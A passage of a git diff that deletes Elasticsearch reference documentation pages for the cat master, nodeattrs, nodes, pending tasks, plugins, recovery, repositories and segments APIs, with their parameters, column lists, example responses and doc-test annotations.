TESTRESPONSE[s/\d+(\.\d+)?[tgmk]?b/\\d+(\\.\\d+)?[tgmk]?b/] -// TESTRESPONSE[s/u8FNjxh8Rfy_awN11oDKYQ|nYFWZEO7TUiOjLQXBaYJpA/.+/ non_json] \ No newline at end of file diff --git a/docs/reference/cat/master.asciidoc b/docs/reference/cat/master.asciidoc deleted file mode 100644 index 1f220d6deca..00000000000 --- a/docs/reference/cat/master.asciidoc +++ /dev/null @@ -1,71 +0,0 @@ -[[cat-master]] -=== cat master API -++++ -cat master -++++ - -Returns information about the master node, including the ID, bound IP address, -and name. - - -[[cat-master-api-request]] -==== {api-request-title} - -`GET /_cat/master` - -[[cat-master-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-master-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-master-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/master?v=true --------------------------------------------------- - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id host ip node -YzWoH_2BT-6UjVGDyPdqYg 127.0.0.1 127.0.0.1 YzWoH_2 --------------------------------------------------- -// TESTRESPONSE[s/YzWoH_2.+/.+/ non_json] - -This information is also available via the `nodes` command, but this -is slightly shorter when all you want to do, for example, is verify -all nodes agree on the master: - -[source,sh] --------------------------------------------------- -% pssh -i -h list.of.cluster.hosts curl -s localhost:9200/_cat/master -[1] 19:16:37 [SUCCESS] es3.vm -Ntgn2DcuTjGuXlhKDUD4vA 192.168.56.30 H5dfFeA -[2] 19:16:37 [SUCCESS] es2.vm -Ntgn2DcuTjGuXlhKDUD4vA 192.168.56.30 H5dfFeA -[3] 19:16:37 [SUCCESS] es1.vm -Ntgn2DcuTjGuXlhKDUD4vA 192.168.56.30 H5dfFeA --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/cat/nodeattrs.asciidoc b/docs/reference/cat/nodeattrs.asciidoc deleted file mode 100644 index 84dff43d284..00000000000 --- a/docs/reference/cat/nodeattrs.asciidoc +++ /dev/null @@ -1,126 +0,0 @@ -[[cat-nodeattrs]] -=== cat nodeattrs API -++++ -cat nodeattrs -++++ - -Returns information about custom node attributes. - -[[cat-nodeattrs-api-request]] -==== {api-request-title} - -`GET /_cat/nodeattrs` - -[[cat-nodeattrs-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-nodeattrs-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ --- -If you do not specify which columns to include, the API returns the default columns in the order listed below. If you explicitly specify one or more columns, it only returns the specified columns. - -Valid columns are: - -`node`,`name`:: -(Default) Name of the node, such as `DKDM97B`. - -`host`, `h`:: -(Default) Host name, such as `n1`. - -`ip`, `i`:: -(Default) IP address, such as `127.0.1.1`. - -`attr`, `attr.name`:: -(Default) Attribute name, such as `rack`. - -`value`, `attr.value`:: -(Default) Attribute value, such as `rack123`. - -`id`, `nodeId`:: -ID of the node, such as `k0zy`. - -`pid`, `p`:: -Process ID, such as `13061`. - -`port`, `po`:: -Bound transport port, such as `9300`. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-nodeattrs-api-example]] -==== {api-examples-title} - -[[cat-nodeattrs-api-ex-default]] -===== Example with default columns - -[source,console] --------------------------------------------------- -GET /_cat/nodeattrs?v=true --------------------------------------------------- -// TEST[s/\?v=true/\?v=true&s=node,attr/] -// Sort the resulting attributes so we can assert on them more easily - -The API returns the following response: - -[source,txt] --------------------------------------------------- -node host ip attr value -... -node-0 127.0.0.1 127.0.0.1 testattr test -... --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.\n$/\n(.+ xpack\\.installed true\n)?\n/] -// TESTRESPONSE[s/\.\.\.\n/(.+ ml\\..+\n)*/ non_json] -// If xpack is not installed then neither ... with match anything -// If xpack is installed then the first ... contains ml attributes -// and the second contains xpack.installed=true - -The `node`, `host`, and `ip` columns provide basic information about each node. -The `attr` and `value` columns return custom node attributes, one per line. - -[[cat-nodeattrs-api-ex-headings]] -===== Example with explicit columns - -The following API request returns the `name`, `pid`, `attr`, and `value` -columns. - -[source,console] --------------------------------------------------- -GET /_cat/nodeattrs?v=true&h=name,pid,attr,value --------------------------------------------------- -// TEST[s/,value/,value&s=node,attr/] -// Sort the resulting attributes so we can assert on them more easily - -The API returns the following response: - -[source,txt] --------------------------------------------------- -name pid attr value -... -node-0 19566 testattr test -... --------------------------------------------------- -// TESTRESPONSE[s/19566/\\d*/] -// TESTRESPONSE[s/\.\.\.\n$/\n(.+ xpack\\.installed true\n)?\n/] -// TESTRESPONSE[s/\.\.\.\n/(.+ ml\\..+\n)*/ non_json] -// If xpack is not installed then neither ... with match anything -// If xpack is installed then the first ... contains ml attributes -// and the second contains xpack.installed=true \ No newline at end of file diff --git a/docs/reference/cat/nodes.asciidoc b/docs/reference/cat/nodes.asciidoc deleted file mode 100644 index 08279d50e5a..00000000000 --- a/docs/reference/cat/nodes.asciidoc +++ /dev/null @@ -1,366 +0,0 @@ -[[cat-nodes]] -=== cat nodes API -++++ -cat nodes -++++ - -Returns information about a cluster's nodes. - -[[cat-nodes-api-request]] -==== {api-request-title} - -`GET /_cat/nodes` - -[[cat-nodes-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-nodes-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -`full_id`:: -(Optional, Boolean) If `true`, return the full node ID. If `false`, return the -shortened node ID. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ --- -If you do not specify which columns to include, the API returns the default columns in the order listed below. If you explicitly specify one or more columns, it only returns the specified columns. - -Valid columns are: - -`ip`, `i`:: -(Default) IP address, such as `127.0.1.1`. - -`heap.percent`, `hp`, `heapPercent`:: -(Default) Maximum configured heap, such as `7`. - -`ram.percent`, `rp`, `ramPercent`:: -(Default) Used total memory percentage, such as `47`. - -`file_desc.percent`, `fdp`, `fileDescriptorPercent`:: -(Default) Used file descriptors percentage, such as `1`. - -`node.role`, `r`, `role`, `nodeRole`:: -(Default) Roles of the node. Returned values include `c` (cold node), `d` (data -node), `h` (hot node), `i` (ingest node), `l` (machine learning node), `m` -(master-eligible node), `r` (remote cluster client node), `s` (content node), -`t` ({transform} node), `v` (voting-only node), `w` (warm node) and `-` -(coordinating node only). -+ -For example, `dim` indicates a master-eligible data and ingest node. See -<>. - -`master`, `m`:: -(Default) Indicates whether the node is the elected master node. Returned values -include `*` (elected master) and `-` (not elected master). - -`name`, `n`:: -(Default) Node name, such as `I8hydUG`. - -`id`, `nodeId`:: -ID of the node, such as `k0zy`. - -`pid`, `p`:: -Process ID, such as `13061`. - -`port`, `po`:: -Bound transport port, such as `9300`. - -`http_address`, `http`:: -Bound http address, such as `127.0.0.1:9200`. - -`version`, `v`:: -Elasticsearch version, such as {version}. - -`build`, `b`:: -Elasticsearch build hash, such as `5c03844`. - -`jdk`, `j`:: -Java version, such as `1.8.0`. - -`disk.total`, `dt`, `diskTotal`:: -Total disk space, such as `458.3gb`. - -`disk.used`, `du`, `diskUsed`:: -Used disk space, such as `259.8gb`. - -`disk.avail`, `d`, `disk`, `diskAvail`:: -Available disk space, such as `198.4gb`. - -`disk.used_percent`, `dup`, `diskUsedPercent`:: -Used disk space percentage, such as `47`. - -`heap.current`, `hc`, `heapCurrent`:: -Used heap, such as `311.2mb`. - -`ram.current`,`rc`, `ramCurrent`:: -Used total memory, such as `513.4mb`. - -`ram.max`, `rm`, `ramMax`:: -Total memory, such as `2.9gb`. - -`file_desc.current`, `fdc`, `fileDescriptorCurrent`:: -Used file descriptors, such as `123`. - -`file_desc.max`, `fdm`, `fileDescriptorMax`:: -Maximum number of file descriptors, such as `1024`. - -`cpu`:: -Recent system CPU usage as percent, such as `12`. - -`load_1m`, `l`:: -Most recent load average, such as `0.22`. - -`load_5m`, `l`:: -Load average for the last five minutes, such as `0.78`. - -`load_15m`, `l`:: -Load average for the last fifteen minutes, such as `1.24`. - -`uptime`, `u`:: -Node uptime, such as `17.3m`. - -`completion.size`, `cs`, `completionSize`:: -Size of completion, such as `0b`. - -`fielddata.memory_size`, `fm`, `fielddataMemory`:: -Used fielddata cache memory, such as `0b`. - -`fielddata.evictions`, `fe`, `fielddataEvictions`:: -Fielddata cache evictions, such as `0`. - -`query_cache.memory_size`, `qcm`, `queryCacheMemory`:: -Used query cache memory, such as `0b`. - -`query_cache.evictions`, `qce`, `queryCacheEvictions`:: -Query cache evictions, such as `0`. - -`query_cache.hit_count`, `qchc`, `queryCacheHitCount`:: -Query cache hit count, such as `0`. - -`query_cache.miss_count`, `qcmc`, `queryCacheMissCount`:: -Query cache miss count, such as `0`. - -`request_cache.memory_size`, `rcm`, `requestCacheMemory`:: -Used request cache memory, such as `0b`. - -`request_cache.evictions`, `rce`, `requestCacheEvictions`:: -Request cache evictions, such as `0`. - -`request_cache.hit_count`, `rchc`, `requestCacheHitCount`:: -Request cache hit count, such as `0`. - -`request_cache.miss_count`, `rcmc`, `requestCacheMissCount`:: -Request cache miss count, such as `0`. - -`flush.total`, `ft`, `flushTotal`:: -Number of flushes, such as `1`. - -`flush.total_time`, `ftt`, `flushTotalTime`:: -Time spent in flush, such as `1`. - -`get.current`, `gc`, `getCurrent`:: -Number of current get operations, such as `0`. - -`get.time`, `gti`, `getTime`:: -Time spent in get, such as `14ms`. - -`get.total`, `gto`, `getTotal`:: -Number of get operations, such as `2`. - -`get.exists_time`, `geti`, `getExistsTime`:: -Time spent in successful gets, such as `14ms`. - -`get.exists_total`, `geto`, `getExistsTotal`:: -Number of successful get operations, such as `2`. - -`get.missing_time`, `gmti`, `getMissingTime`:: -Time spent in failed gets, such as `0s`. - -`get.missing_total`, `gmto`, `getMissingTotal`:: -Number of failed get operations, such as `1`. - -`indexing.delete_current`, `idc`, `indexingDeleteCurrent`:: -Number of current deletion operations, such as `0`. - -`indexing.delete_time`, `idti`, `indexingDeleteTime`:: -Time spent in deletions, such as `2ms`. - -`indexing.delete_total`, `idto`, `indexingDeleteTotal`:: -Number of deletion operations, such as `2`. - -`indexing.index_current`, `iic`, `indexingIndexCurrent`:: -Number of current indexing operations, such as `0`. - -`indexing.index_time`, `iiti`, `indexingIndexTime`:: -Time spent in indexing, such as `134ms`. - -`indexing.index_total`, `iito`, `indexingIndexTotal`:: -Number of indexing operations, such as `1`. - -`indexing.index_failed`, `iif`, `indexingIndexFailed`:: -Number of failed indexing operations, such as `0`. - -`merges.current`, `mc`, `mergesCurrent`:: -Number of current merge operations, such as `0`. - -`merges.current_docs`, `mcd`, `mergesCurrentDocs`:: -Number of current merging documents, such as `0`. - -`merges.current_size`, `mcs`, `mergesCurrentSize`:: -Size of current merges, such as `0b`. - -`merges.total`, `mt`, `mergesTotal`:: -Number of completed merge operations, such as `0`. - -`merges.total_docs`, `mtd`, `mergesTotalDocs`:: -Number of merged documents, such as `0`. - -`merges.total_size`, `mts`, `mergesTotalSize`:: -Size of current merges, such as `0b`. - -`merges.total_time`, `mtt`, `mergesTotalTime`:: -Time spent merging documents, such as `0s`. - -`refresh.total`, `rto`, `refreshTotal`:: -Number of refreshes, such as `16`. - -`refresh.time`, `rti`, `refreshTime`:: -Time spent in refreshes, such as `91ms`. - -`script.compilations`, `scrcc`, `scriptCompilations`:: -Total script compilations, such as `17`. - -`script.cache_evictions`, `scrce`, `scriptCacheEvictions`:: -Total compiled scripts evicted from cache, such as `6`. - -`search.fetch_current`, `sfc`, `searchFetchCurrent`:: -Current fetch phase operations, such as `0`. - -`search.fetch_time`, `sfti`, `searchFetchTime`:: -Time spent in fetch phase, such as `37ms`. - -`search.fetch_total`, `sfto`, `searchFetchTotal`:: -Number of fetch operations, such as `7`. - -`search.open_contexts`, `so`, `searchOpenContexts`:: -Open search contexts, such as `0`. - -`search.query_current`, `sqc`, `searchQueryCurrent`:: -Current query phase operations, such as `0`. - -`search.query_time`, `sqti`, `searchQueryTime`:: -Time spent in query phase, such as `43ms`. - -`search.query_total`, `sqto`, `searchQueryTotal`:: -Number of query operations, such as `9`. - -`search.scroll_current`, `scc`, `searchScrollCurrent`:: -Open scroll contexts, such as `2`. - -`search.scroll_time`, `scti`, `searchScrollTime`:: -Time scroll contexts held open, such as `2m`. - -`search.scroll_total`, `scto`, `searchScrollTotal`:: -Completed scroll contexts, such as `1`. - -`segments.count`, `sc`, `segmentsCount`:: -Number of segments, such as `4`. - -`segments.memory`, `sm`, `segmentsMemory`:: -Memory used by segments, such as `1.4kb`. - -`segments.index_writer_memory`, `siwm`, `segmentsIndexWriterMemory`:: -Memory used by index writer, such as `18mb`. - -`segments.version_map_memory`, `svmm`, `segmentsVersionMapMemory`:: -Memory used by version map, such as `1.0kb`. - -`segments.fixed_bitset_memory`, `sfbm`, `fixedBitsetMemory`:: -Memory used by fixed bit sets for nested object field types and type filters for -types referred in <> fields, such as `1.0kb`. - -`suggest.current`, `suc`, `suggestCurrent`:: -Number of current suggest operations, such as `0`. - -`suggest.time`, `suti`, `suggestTime`:: -Time spent in suggest, such as `0`. - -`suggest.total`, `suto`, `suggestTotal`:: -Number of suggest operations, such as `0`. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -`local`:: -(Optional, boolean) -deprecated:[7.6.0,This parameter does not cause this API to act locally. It will be removed in version 8.0.] -If `true`, the request computes the list of selected nodes from the local -cluster state. Defaults to `false`, which means the list of selected nodes is -computed from the cluster state on the master node. In either case the -coordinating node sends a request for further information to each selected -node. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-nodes-api-example]] -==== {api-examples-title} - -[[cat-nodes-api-ex-default]] -===== Example with default columns - -[source,console] --------------------------------------------------- -GET /_cat/nodes?v=true --------------------------------------------------- - -The API returns the following response: - -[source,txt] --------------------------------------------------- -ip heap.percent ram.percent cpu load_1m load_5m load_15m node.role master name -127.0.0.1 65 99 42 3.07 dim * mJw06l1 --------------------------------------------------- -// TESTRESPONSE[s/3.07/(\\d+\\.\\d+( \\d+\\.\\d+ (\\d+\\.\\d+)?)?)?/] -// TESTRESPONSE[s/65 99 42/\\d+ \\d+ \\d+/] -// TESTRESPONSE[s/dim/.+/ s/[*]/[*]/ s/mJw06l1/.+/ non_json] - -The `ip`, `heap.percent`, `ram.percent`, `cpu`, and `load_*` columns provide the -IP addresses and performance information of each node. - -The `node.role`, `master`, and `name` columns provide information useful for -monitoring an entire cluster, particularly large ones. - - -[[cat-nodes-api-ex-headings]] -===== Example with explicit columns -The following API request returns the `id`, `ip`, `port`, `v` (version), and `m` -(master) columns. - -[source,console] --------------------------------------------------- -GET /_cat/nodes?v=true&h=id,ip,port,v,m --------------------------------------------------- - -The API returns the following response: - -["source","txt",subs="attributes,callouts"] --------------------------------------------------- -id ip port v m -veJR 127.0.0.1 59938 {version} * --------------------------------------------------- -// TESTRESPONSE[s/veJR/.+/ s/59938/\\d+/ s/[*]/[*]/ non_json] diff --git a/docs/reference/cat/pending_tasks.asciidoc b/docs/reference/cat/pending_tasks.asciidoc deleted file mode 100644 index 8597dba4dfa..00000000000 --- a/docs/reference/cat/pending_tasks.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[[cat-pending-tasks]] -=== cat pending tasks API -++++ -cat pending tasks -++++ - -Returns cluster-level changes that have not yet been executed, similar to the -<> API. - -[[cat-pending-tasks-api-request]] -==== {api-request-title} - -`GET /_cat/pending_tasks` - -[[cat-pending-tasks-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-pending-tasks-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-pending-tasks-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/pending_tasks?v=true --------------------------------------------------- - -The API returns the following response: - -[source,txt] --------------------------------------------------- -insertOrder timeInQueue priority source - 1685 855ms HIGH update-mapping [foo][t] - 1686 843ms HIGH update-mapping [foo][t] - 1693 753ms HIGH refresh-mapping [foo][[t]] - 1688 816ms HIGH update-mapping [foo][t] - 1689 802ms HIGH update-mapping [foo][t] - 1690 787ms HIGH update-mapping [foo][t] - 1691 773ms HIGH update-mapping [foo][t] --------------------------------------------------- -// TESTRESPONSE[s/(\n.+)+/(\\n.+)*/ non_json] -// We can't assert anything about the tasks in progress here because we don't -// know what might be in progress.... diff --git a/docs/reference/cat/plugins.asciidoc b/docs/reference/cat/plugins.asciidoc deleted file mode 100644 index 40207186b6e..00000000000 --- a/docs/reference/cat/plugins.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[[cat-plugins]] -=== cat plugins API -++++ -cat plugins -++++ - -Returns a list of plugins running on each node of a cluster. - - -[[cat-plugins-api-request]] -==== {api-request-title} - -`GET /_cat/plugins` - -[[cat-plugins-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-plugins-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-plugins-api-example]] -==== {api-examples-title} - -[source,console] ------------------------------------------------------------------------------- -GET /_cat/plugins?v=true&s=component&h=name,component,version,description ------------------------------------------------------------------------------- - -The API returns the following response: - -["source","txt",subs="attributes,callouts"] ------------------------------------------------------------------------------- -name component version description -U7321H6 analysis-icu {version_qualified} The ICU Analysis plugin integrates the Lucene ICU module into Elasticsearch, adding ICU-related analysis components. -U7321H6 analysis-kuromoji {version_qualified} The Japanese (kuromoji) Analysis plugin integrates Lucene kuromoji analysis module into elasticsearch. -U7321H6 analysis-nori {version_qualified} The Korean (nori) Analysis plugin integrates Lucene nori analysis module into elasticsearch. -U7321H6 analysis-phonetic {version_qualified} The Phonetic Analysis plugin integrates phonetic token filter analysis with elasticsearch. -U7321H6 analysis-smartcn {version_qualified} Smart Chinese Analysis plugin integrates Lucene Smart Chinese analysis module into elasticsearch. -U7321H6 analysis-stempel {version_qualified} The Stempel (Polish) Analysis plugin integrates Lucene stempel (polish) analysis module into elasticsearch. -U7321H6 analysis-ukrainian {version_qualified} The Ukrainian Analysis plugin integrates the Lucene UkrainianMorfologikAnalyzer into elasticsearch. -U7321H6 discovery-azure-classic {version_qualified} The Azure Classic Discovery plugin allows to use Azure Classic API for the unicast discovery mechanism -U7321H6 discovery-ec2 {version_qualified} The EC2 discovery plugin allows to use AWS API for the unicast discovery mechanism. -U7321H6 discovery-gce {version_qualified} The Google Compute Engine (GCE) Discovery plugin allows to use GCE API for the unicast discovery mechanism. -U7321H6 ingest-attachment {version_qualified} Ingest processor that uses Apache Tika to extract contents -U7321H6 mapper-annotated-text {version_qualified} The Mapper Annotated_text plugin adds support for text fields with markup used to inject annotation tokens into the index. -U7321H6 mapper-murmur3 {version_qualified} The Mapper Murmur3 plugin allows to compute hashes of a field's values at index-time and to store them in the index. -U7321H6 mapper-size {version_qualified} The Mapper Size plugin allows document to record their uncompressed size at index time. -U7321H6 store-smb {version_qualified} The Store SMB plugin adds support for SMB stores. -U7321H6 transport-nio {version_qualified} The nio transport. ------------------------------------------------------------------------------- -// TESTRESPONSE[s/([.()])/\\$1/ s/U7321H6/.+/ non_json] \ No newline at end of file diff --git a/docs/reference/cat/recovery.asciidoc b/docs/reference/cat/recovery.asciidoc deleted file mode 100644 index 6c91b313cac..00000000000 --- a/docs/reference/cat/recovery.asciidoc +++ /dev/null @@ -1,153 +0,0 @@ -[[cat-recovery]] -=== cat recovery API -++++ -cat recovery -++++ - - -Returns information about ongoing and completed shard recoveries, -similar to the <> API. - -For data streams, the API returns information about the stream's backing -indices. - -[[cat-recovery-api-request]] -==== {api-request-title} - -`GET /_cat/recovery/` - -`GET /_cat/recovery` - -[[cat-recovery-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. You must -also have the `monitor` or `manage` <> -for any data stream, index, or index alias you retrieve. - -[[cat-recovery-api-desc]] -==== {api-description-title} - -The cat recovery API returns information about shard recoveries, both -ongoing and completed. It is a more compact view of the JSON -<> API. - -include::{es-repo-dir}/indices/recovery.asciidoc[tag=shard-recovery-desc] - - -[[cat-recovery-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[cat-recovery-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=active-only] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=detailed] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-query-parm] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-recovery-api-example]] -==== {api-examples-title} - -[[cat-recovery-api-ex-dead]] -===== Example with no ongoing recoveries - -[source,console] ----------------------------------------------------------------------------- -GET _cat/recovery?v=true ----------------------------------------------------------------------------- -// TEST[setup:my_index] - -The API returns the following response: - -[source,txt] ---------------------------------------------------------------------------- -index shard time type stage source_host source_node target_host target_node repository snapshot files files_recovered files_percent files_total bytes bytes_recovered bytes_percent bytes_total translog_ops translog_ops_recovered translog_ops_percent -my-index-000001 0 13ms store done n/a n/a 127.0.0.1 node-0 n/a n/a 0 0 100% 13 0 0 100% 9928 0 0 100.0% ---------------------------------------------------------------------------- -// TESTRESPONSE[s/store/empty_store/] -// TESTRESPONSE[s/100%/0.0%/] -// TESTRESPONSE[s/9928/0/] -// TESTRESPONSE[s/13ms/[0-9.]+m?s/] -// TESTRESPONSE[s/13/\\d+/ non_json] - -In this example response, the source and target nodes are the same because the -recovery type is `store`, meaning they were read from local storage on node -start. - -[[cat-recovery-api-ex-live]] -===== Example with a live shard recovery - -By increasing the replica count of an index and bringing another node online to -host the replicas, you can retrieve information about an ongoing recovery. - -[source,console] ----------------------------------------------------------------------------- -GET _cat/recovery?v=true&h=i,s,t,ty,st,shost,thost,f,fp,b,bp ----------------------------------------------------------------------------- -// TEST[setup:my_index] - -The API returns the following response: - -[source,txt] ----------------------------------------------------------------------------- -i s t ty st shost thost f fp b bp -my-index-000001 0 1252ms peer done 192.168.1.1 192.168.1.2 0 100.0% 0 100.0% ----------------------------------------------------------------------------- -// TESTRESPONSE[s/peer/empty_store/] -// TESTRESPONSE[s/192.168.1.2/127.0.0.1/] -// TESTRESPONSE[s/192.168.1.1/n\/a/] -// TESTRESPONSE[s/100.0%/0.0%/] -// TESTRESPONSE[s/1252ms/[0-9.]+m?s/ non_json] - -In this example response, the recovery type is `peer`, meaning the shard -recovered from another node. The returned files and bytes are real-time -measurements. - -[[cat-recovery-api-ex-snapshot]] -===== Example with a snapshot recovery - -You can restore backups of an index using the <> API. You can use the cat recovery API retrieve information about a -snapshot recovery. - -[source,console] --------------------------------------------------------------------------------- -GET _cat/recovery?v=true&h=i,s,t,ty,st,rep,snap,f,fp,b,bp --------------------------------------------------------------------------------- -// TEST[skip:no need to execute snapshot/restore here] - -The API returns the following response with a recovery type of `snapshot`: - -[source,txt] --------------------------------------------------------------------------------- -i s t ty st rep snap f fp b bp -my-index-000001 0 1978ms snapshot done my-repo snap_1 79 8.0% 12086 9.0% --------------------------------------------------------------------------------- -// TESTRESPONSE[non_json] \ No newline at end of file diff --git a/docs/reference/cat/repositories.asciidoc b/docs/reference/cat/repositories.asciidoc deleted file mode 100644 index bdcf8a589ea..00000000000 --- a/docs/reference/cat/repositories.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[[cat-repositories]] -=== cat repositories API -++++ -cat repositories -++++ - -Returns the <> for a cluster. - - -[[cat-repositories-api-request]] -==== {api-request-title} - -`GET /_cat/repositories` - -[[cat-repositories-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`monitor_snapshot`, `create_snapshot`, or `manage` -<> to use this API. - -[[cat-repositories-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-repositories-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/repositories?v=true --------------------------------------------------- -// TEST[s/^/PUT \/_snapshot\/repo1\n{"type": "fs", "settings": {"location": "repo\/1"}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id type -repo1 fs -repo2 s3 --------------------------------------------------- -// TESTRESPONSE[s/\nrepo2 s3// non_json] diff --git a/docs/reference/cat/segments.asciidoc b/docs/reference/cat/segments.asciidoc deleted file mode 100644 index 7bc38e00777..00000000000 --- a/docs/reference/cat/segments.asciidoc +++ /dev/null @@ -1,136 +0,0 @@ -[[cat-segments]] -=== cat segments API -++++ -cat segments -++++ - -Returns low-level information about the https://lucene.apache.org/core/[Lucene] -segments in index shards, similar to the <> -API. - -For data streams, the API returns information about the stream's backing -indices. - -[[cat-segments-api-request]] -==== {api-request-title} - -`GET /_cat/segments/` - -`GET /_cat/segments` - -[[cat-segments-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. You must -also have the `monitor` or `manage` <> -for any data stream, index, or index alias you retrieve. - -[[cat-segments-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[cat-segments-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ --- -If you do not specify which columns to include, the API returns the default -columns in the order listed below. If you explicitly specify one or more -columns, it only returns the specified columns. - -Valid columns are: - -`index`, `i`, `idx`:: -(Default) Name of the index. - -`shard`, `s`, `sh`:: -(Default) Name of the shard. - -`prirep`, `p`, `pr`, `primaryOrReplica`:: -(Default) Shard type. Returned values are `primary` or `replica`. - -`ip`:: -(Default) IP address of the segment's shard, such as `127.0.1.1`. - -`segment`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment] - -`generation`:: -(Default) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=generation] - -`docs.count`:: -(Default) 